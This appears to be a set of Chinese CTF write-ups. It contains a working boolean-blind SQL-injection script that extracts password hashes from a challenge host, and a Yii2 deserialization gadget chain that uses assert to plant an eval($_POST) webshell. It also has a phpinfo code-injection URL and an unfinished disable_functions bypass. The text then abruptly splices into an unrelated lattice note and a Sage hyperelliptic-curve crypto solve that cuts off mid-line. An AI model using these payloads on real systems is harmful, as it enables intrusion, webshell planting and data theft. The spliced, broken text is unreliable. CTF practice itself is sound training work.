image.php 有sql注入
```
import requests
import sys
# Boolean-based blind SQL-injection client from the writeup (target URL below).
# Oracle: the injected condition goes into the `id` parameter of image.php and a
# response body longer than 1000 bytes is read as "condition true".  One request
# is sent per (string position i, candidate byte j), i.e. up to 98 requests per
# recovered character — that request volume, plus the payload shape noted below,
# is what makes this technique easy to pick out of access logs.
session = requests.session()
hh=''    # characters recovered so far; printed after every confirmed byte
burp0_url = "http://eci-2zeab1jn4vnk23hzs0z3.cloudeci1.ichunqiu.com:80/image.php"
for i in range(1,100):            # i: 1-based position inside the extracted string
    for j in range(30,129):       # j: candidate byte value, 30..127 tried in order
        if j==128:
            # No candidate matched at this position: treat the string as finished.
            sys.exit(1)
        #print(gg)
        # Three staged queries (table names -> column names of `users` -> password
        # column).  The assignments overwrite each other, so only the last one is
        # actually sent by the request below.  Spaces are rewritten to `/**/`
        # inline comments; together with `information_schema`, `group_concat(` and
        # `ascii(substr(` inside a numeric `id` parameter this is the signature a
        # WAF rule or log filter can match on.
        params={'id':"2/(select/**/ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctf'),{},1))={})".replace(' ','/**/').format(i,j)}
        params={'id':"2/(select/**/ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='users'),{},1))={})".replace(' ','/**/').format(i,j)}
        params={'id':"2/(select/**/ascii(substr((select group_concat(password)from users),{},1))={})".replace(' ','/**/').format(i,j)}
        r=session.get(burp0_url,params=params)
        a=len(r.text)             # response length is the only signal the script uses
        if a>1000:
            hh+=chr(j)
            print(hh)
            break                 # byte found; move on to the next position
```
得到密码登录
登录后
File:///flag 得到flag
robots.txt看到1ndexx.php .1ndexx.php.swp泄露
index.php?code=<?php+phpinfo();?>
然后访问hack.php得到flag
Yii2漏洞 about 路由反序列化 直接网上exp assert 写shell
```
<?php
// Gadget-chain generator for the Yii2 deserialization issue mentioned above.
// Running this file on its own executes nothing: it only builds three nested
// objects and prints the base64 of their serialized form.  The property values
// below are the name of the PHP function assert() and a string of PHP source;
// whatever turns those into code execution happens inside the vulnerable
// application when it unserializes the blob, not in this script.
// Defender note: serialized data that names Codeception\Extension\RunProcess,
// Faker\Generator and yii\rest\CreateAction together with the string "assert"
// is a concrete indicator of this chain in request bodies, cookies or logs.
namespace yii\rest{
    class CreateAction{
        // Function name carried by the chain (assert); presumably invoked as a
        // callable by the application — that call site is not shown here.
        public $checkAccess;
        // String of PHP source carried alongside it; it writes a file at the
        // hard-coded path when eventually evaluated (not by this script).
        public $id;
        public function __construct(){
            $this->checkAccess = 'assert';
            $this->id = 'file_put_contents("/var/www/html/web/a.php","<?=eval(\\$_POST[a]);?>");';
        }
    }
}
namespace Faker{
    use yii\rest\CreateAction;
    class Generator{
        protected $formatters;
        public function __construct(){
            // PHP array-callable pair (object, method name) stored under the
            // 'isRunning' key; the constructor above runs here, at generation time.
            $this->formatters['isRunning'] = [new CreateAction(), 'run'];
        }
    }
}
// poc2
namespace Codeception\Extension{
    use Faker\Generator;
    class RunProcess{
        // Outermost object of the chain; holds the Generator in a private array.
        private $processes;
        public function __construct()
        {
            $this->processes = [new Generator()];
        }
    }
}
namespace{
    // Serialize the outermost object and print it base64-encoded for transport.
    echo base64_encode(serialize(new Codeception\Extension\RunProcess()));
}
?>
```
写shell
需要bypass disable_function
Apache mod cgi 绕过
```
<?php
$cmd = "/readflag > /tmp/1"; //comman
一看到还以为是小数的背包问题, 仔细想想并不是, 来看一下式子就能懂了, 先看得到密文的式子
是已知的, 而且是小数, 不能直接造格子, 但我们把分配给每一项就不一样了, 对于其中一项
超椭圆曲线...第一次接触,但搜到了原题
https://pwnthem0le.polito.it/2020/12/20/hxpCTF-2020-Hyper-writeup/
具体原理我不是很懂也不敢乱说
改一下上面链接的exp就可以了
#sage
import itertools
import struct
p = 10000000000000001119                      # field characteristic used by the challenge
R.<x> = GF(p)[]                               # Sage preparser syntax: polynomial ring GF(p)[x], generator x
y = x
f = y + y^7                                   # f(x) = x + x^7 (degree 7)
C = HyperellipticCurve(f, 0)                  # curve y^2 = f(x); second argument is the h(x) term, here 0
J = C.jacobian()
# Divisor classes of the curve points with x = 11, 22, 33.  `sqrt(0,1)` is
# presumably sqrt(extend=False, all=True) and min() picks one of the two square
# roots deterministically — confirm against the Sage docs.  The comprehension
# variable x shadows the ring generator only inside the comprehension (Python 3
# scoping), so R's x is unchanged afterwards.  Ds is not used in the lines shown.
Ds = [J(C(x, min(f(x).sqrt(0,1)))) for x in (11,22,33)]
enc = bytes.fromhex('66def695b20eeae3141ea80240e9bc7138c8fc5aef20532282944ebbbad76a6e17446e92de5512091fe81255eb34a0e22a86a090e25dbbe3141aff0542f5')
# Known-plaintext recovery of keystream: the plaintext is known to start with
# 20 'a' bytes followed by "flag".  `^^` is XOR in Sage, and zip() stops at the
# shorter input, so rng_output holds the first 24 keystream bytes.
known_pt = ('a'*20+'flag').encode()
rng_output = bytes(e^^m for e,m in zip(enc, known_pt))
blocks = [rng_output[i:i+8] for i in range(0, len(rng_output), 8)]   # three 8-byte blocks
ui = [int.from_bytes(r, 'little') for r in blocks]                   # each block as a little-endian integer
# Monic cubic whose coefficients are the three recovered words; looks like the
# u-polynomial of a Mumford (u, v) divisor representation, with v rebuilt in
# the loop that follows — verify against the original writeup linked above.
u = x^3 + ui[2]*x^2 + ui[1]*x + ui[0]
L = GF(p).algebraic_closure()                 # roots of u are taken over the algebraic closure below
FL = True                                     # loop flag for the while-loop that follows
while FL:
roots = [r[0] for r in u.change_ring(L).roots()]
RR.<zz> = PolynomialRing(L)
v = RR.lagrange_polynomial([(xi, f(xi).sqrt()) for xi in roots])
vi = [v.coefficients()[i].as_finite_f